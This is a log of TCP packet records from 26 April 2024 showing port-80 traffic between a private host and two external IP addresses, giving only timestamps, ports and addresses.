Apr 26, 2024 23:09:02.588761091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588773966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588783979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588805914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588813066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588845015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588871956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588885069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588896990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588907957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588915110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588939905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588965893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588979006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588994026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589027882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589044094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589057922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589092016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589114904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589127064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589159012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589174986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589188099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589222908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589226007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589261055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589268923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589272022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589288950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589309931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589334965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589348078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589369059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589389086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589401007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589402914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589530945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589544058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589555025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589576960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589577913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589591026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589591980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589636087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.589638948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589673996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.589719057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.737037897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.737070084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.737076998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.737258911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.795403004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.795547962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.795694113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.819919109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.819931984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.819983006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820146084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820193052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820214987 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820226908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820270061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820281982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820292950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820303917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820313931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820342064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820363045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820377111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820399046 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820409060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820425987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820447922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820478916 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820491076 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820502043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.820530891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.820557117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.821279049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.821322918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.821583033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.821633101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.821645021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.821687937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.821830034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.821867943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.821970940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822010994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822081089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822129011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822190046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822233915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822329998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822376966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822443008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822485924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822499037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822520971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822542906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822551966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822568893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822607040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822758913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.822805882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.822963953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823013067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823082924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823132038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823143959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823189974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823230982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823261023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823278904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823296070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823368073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823410988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823431969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823473930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823486090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823518038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823524952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823559046 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823657990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823714972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823726892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823779106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823801041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823848009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823900938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.823951006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.823991060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824038982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824050903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824096918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824124098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824168921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824181080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824227095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824249029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824297905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824363947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824414968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824763060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824820042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824836969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824856043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824896097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.824939013 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.824987888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.825027943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.825043917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.825084925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.825169086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.825211048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.825222969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.825263023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.825275898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.825316906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.825467110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.825514078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.825937986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.825979948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.826128006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.826170921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.826462030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.826503992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.826654911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.826694012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.826766968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.826806068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.826915026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.826952934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827208042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827349901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827358961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827389002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827431917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827487946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827500105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827512026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827539921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827552080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827558994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827569008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827585936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827595949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827609062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827615976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827642918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827656984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827701092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827718973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827729940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827753067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827759981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827768087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827776909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827788115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827810049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827821016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827860117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827886105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827897072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827908039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827918053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827934027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827939987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827955961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827966928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.827972889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.827996969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828008890 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828036070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828041077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828052998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828075886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828093052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828104019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828125000 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828139067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828147888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828157902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828166008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828181982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828200102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828226089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828238010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828248978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828259945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828265905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828280926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828298092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828316927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828342915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828372955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828392029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828399897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828409910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828417063 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828425884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828433990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828454971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828459024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828475952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828486919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828494072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828502893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828524113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828535080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828543901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828569889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828577995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828588963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828608990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828618050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828630924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828635931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828653097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828661919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828668118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828680038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828704119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828715086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828722000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828747034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828788996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828799963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828809023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828825951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828835964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828855038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828865051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828903913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828939915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828952074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828963041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.828977108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828989983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.828996897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829009056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829018116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829046011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829052925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829062939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829082966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829088926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829106092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829118967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829152107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829163074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829188108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829193115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829210043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829222918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829229116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829257965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829277992 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829291105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829302073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829340935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829351902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829371929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829379082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829411983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829422951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829449892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829457998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829467058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829484940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829495907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829504013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829539061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829576015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829588890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829600096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829608917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829618931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829626083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829634905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829646111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829663038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829672098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829679966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829689980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829705954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829725027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829732895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829758883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829768896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829781055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829799891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829813957 CEST	49733	80	192.168.2.4	185.172.128.76
